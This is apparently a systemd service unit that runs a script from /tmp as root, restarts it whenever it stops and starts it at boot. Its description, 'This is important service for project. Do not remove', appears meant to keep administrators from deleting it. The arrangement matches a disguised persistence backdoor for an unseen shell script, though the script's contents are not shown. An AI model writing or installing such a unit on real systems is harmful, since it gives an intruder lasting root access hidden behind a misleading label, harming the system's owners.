[Unit]
Description=This is important service for project. Do not remove

[Service]
User=root            
WorkingDirectory=/root                           
ExecStart=/bin/bash /tmp/shell.sh            
Restart=always

[Install]
WantedBy=multi-user.target
